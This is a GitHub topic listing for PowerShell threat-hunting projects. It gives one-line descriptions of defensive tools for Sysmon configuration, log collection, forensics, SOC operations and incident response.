A repository of sysmon configuration modules
-
Updated
Jul 17, 2024 - PowerShell
A repository of sysmon configuration modules
Advanced Sysmon ATT&CK configuration focusing on Detecting the Most Techniques per Data source in MITRE ATT&CK, Provide Visibility into Forensic Artifact Events for UEBA, Detect Exploitation events with wide CVE Coverage, and Risk Scoring of CVE, UEBA, Forensic, and MITRE ATT&CK Events.
DetectionLabELK is a fork from DetectionLab with ELK stack instead of Splunk.
A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
Cover various security approaches to attack techniques and also provides new discoveries about security breaches.
Automation scripts to deploy Windows Event Forwarding, Sysmon, and custom audit policies in an Active Directory environment.
A datasource assessment on an event level to show potential coverage or the MITRE ATT&CK framework
Microsoft Sentinel SOC Operations
Gather Open-Source Intelligence using PowerShell.
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
ThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.
Threat Hunting with ELK Workshop (InfoSecWorld 2017)
Purpleteam scripts simulation & Detection - trigger events for SOC detections
PowerGRR is an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.
Powershell script to help Speed up Threat hunting incident response processes
Collection of Remote Management Monitoring tool artifacts, for assisting forensics and investigations
incident response scripts
Powershell scripts for identifying compromised Office 365 accounts/mailboxes
Add a description, image, and links to the threat-hunting topic page so that developers can more easily learn about it.
To associate your repository with the threat-hunting topic, visit your repo's landing page and select "manage topics."